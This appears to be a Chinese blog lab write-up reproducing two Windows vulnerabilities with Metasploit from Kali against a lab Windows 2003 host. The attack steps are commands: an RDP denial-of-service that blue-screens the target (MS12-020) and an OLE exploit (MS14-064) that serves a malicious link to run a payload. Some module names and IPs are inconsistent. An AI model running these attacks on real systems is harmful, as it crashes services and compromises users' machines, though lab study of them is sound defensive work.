首页 > 其他分享 >漏洞复现--实验记录(MS12-020、MS14-064)

漏洞复现--实验记录(MS12-020、MS14-064)

时间:2024-08-07 08:58:33浏览次数:15  
标签:064 漏洞 -- 192.168 MS12 远程桌面 靶机 020

漏洞复现



一、MS12-020(蓝屏攻击)漏洞

1.原理

ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,Windows在处理某些RDP报文时Terminal Server 存在错误,可被利用造成服务停止响应(蓝屏)

根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。

微软的安全公告:Windows全系列操作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。

2.实验环境

攻击机:kali IP:192.168.92.128
靶机win2003 IP:192.168.92.148
两者都在同一内网,采用NAT连接方式

3.漏洞复现

1、开启win2003的远程桌面:控制面板–>系统–>远程–>远程协助–>远程桌面

在这里插入图片描述

2、控制面板–>windows防火墙–>例外–>远程桌面

在这里插入图片描述

3、用nmap扫描靶机,发现靶机的3389端口已经打开

输入:nmap 192.168.92.148
在这里插入图片描述

4、在kali的终端中打开msfconsole

在这里插入图片描述

5、使用search功能搜索ms12-020,发现有两个可用模块。

输入:search ms12-020
在这里插入图片描述

6、使用第一个可用版模块

输入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids
或者use 0
在这里插入图片描述

7、利用set命令设置攻击的IP。

输入:set rhosts 192.168.252.160

show options
在这里插入图片描述

8、输入:exploit,执行攻击

在这里插入图片描述

9、看一下靶机,发现靶机蓝屏了

在这里插入图片描述

二、MS14-064(OLE远程代码执行)漏洞

1.原理

Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。

生成一个恶意链接,让用户点击后,用户的ie浏览器会执行操作:访问攻击者指定的ip下载并执行恶意程序,当用户执行恶意程序后,攻击者就能链接到用户的电脑。

2.实验环境

攻击机:kali ip:192.168.92.128
靶机:win2003 ip:192.168.92.148
工具kali MSF

3.漏洞复现

1、打开kali 进入MSF框架

2、找到MS14-064漏洞

search ms14-064
use 0
在这里插入图片描述

3、查看当前模块参数

show options

在这里插入图片描述

4、设置参数

set AllowPowershellPrompt true
set srvhost 192.168.204.128
//设置服务器地址ip
在这里插入图片描述

5、查看和设置可攻击目标

show targets
set targets 1
在这里插入图片描述

6、执行获得恶意链接

run
exploit
在这里插入图片描述
http://192.168.92.128:8080/48RjcxdmmZe41H
在这里插入图片描述


标签:064,漏洞,--,192.168,MS12,远程桌面,靶机,020
From: https://blog.csdn.net/qq_72421395/article/details/140918585

相关文章

  • 情绪,往往是工作中最大的阻碍
    按照昨天的计划,我今天开始启动番茄钟了,上午完成的还不错,而且因为内心比较平静,而且也能静下心来做事,进展得比较顺利,而下午的时候,明显心态没有上午平静,变得有点儿浮躁不安,不会有不想做事的情绪,但是很容易分心,尽管开启了番茄钟,但是依然不能把每一个番茄钟的时间都花在工作上。 ......
  • 今日记 | 工作中的深入探索。
     写于2020年05月08日今天的心情有点儿复杂,我从五一假期回来之后,我就跟自己说,在工作中,我不想一直沉睡下去了,我想真正去创造属于我自己的价值。 就算是没有任务的时候,我还是想深耕,并且想要有新的进步和提升,既然可能未来两三年都还是从事测试这个工作,我不想井底之蛙式地工作......
  • pytorch和deep learning技巧和bug解决方法短篇收集
    有一些几句话就可以说明白的观点或者解决的的问题,小虎单独收集到这里。torch.hub.loadhowdoesitwork下载预训练模型再载入,用程序下载链接可能失效。model=torch.hub.load('ultralytics/yolov5','yolov5s')model=torch.hub.load('ultralytics/yolov3','yolov3......
  • Apache 中的新零日漏洞允许远程代码执行
    ApacheOFBiz开源企业资源规划(ERP)系统中披露了一个新的零日预认证远程代码执行漏洞,该漏洞可能允许威胁行为者在受影响的实例上实现远程代码执行。该漏洞编号为CVE-2024-38856,CVSS评分为9.8(满分10.0)。该漏洞会影响18.12.15之前的ApacheOFBiz版本。发现并报告该漏洞......
  • PostgreSQL学习之pg_recvlogical与pgoutput的使用
        参考:        pg内功修炼:逻辑复制_pgoutput-CSDN博客        PG原生解码工具pg_recvlogical的使用-在脑裂时帮我们找回丢失的数据-腾讯云开发者社区-腾讯云(tencent.com)        postgresql数据库的原生解码插件pg_recvlogical可以将wal......
  • Java中对数组的学习
    数组的概念目录数组的概念声明数组变量创建数组处理数组数组作为函数的参数数组作为函数的返回值数组对于每一门编程语言来说都是重要的数据结构之一,当然不同语言对数组的实现及处理也不尽相同。Java语言中提供的数组是用来存储固定大小的同类型元素。你可以声明一个数组变......
  • Linux 中 core dump 异常的分析
    目录一、概述二、发生coredump的原因1.空指针或非法指针2.数组越界或指针越界3.数据竞争三、分析coredump的方法1.启用coredump2.触发coredump2.1因空指针解引用而崩溃2.2通过信号触发coredump3.利用gdb分析coredump一、概述在UNIX......
  • 贝壳的面经!怎么好像有点简单?
    今天分享粉丝最新投稿的北京贝壳外包面经,我把项目相关的都去掉了,其他的问题整理下来感觉不是很难,你觉得呢?换做是你的话你答得出来吗?面经整理如下:北京贝壳外包自我介绍项目拷打Redis跟MySQL以及Kafka之间是什么关系?Redis是内存数据结构存储系统,用于快速读写和高并发......
  • 大模型备案流程最详细说明【附评估测试题+附件】
    2024年3月1日,我国通过了《生成式人工智能服务安全基本要求》(以下简称《AIGC安全要求》),这是目前我国第一部有关AIGC服务安全性方面的技术性指导文件,对语料安全、模型安全、安全措施、词库/题库要求、安全评估等方面提出了具体规范和要求。(一)适用主体《AIGC安全要求》的适用主......
  • IC设计企业如何真正实现便捷又高效地云租户文件传输?
    越来越多的IC设计企业选择开通云租户的方式进行半导体芯片的设计和验证工作,也即在HPC环境中进行芯片设计流程,对于IC设计企业而言,使用云租户有明显的好处和优势:资源分配:云平台会根据租户的需求分配相应的资源,如独立的身份ID、虚拟私有云(VPC)等。每个租户都拥有自己独立的资源环境,保......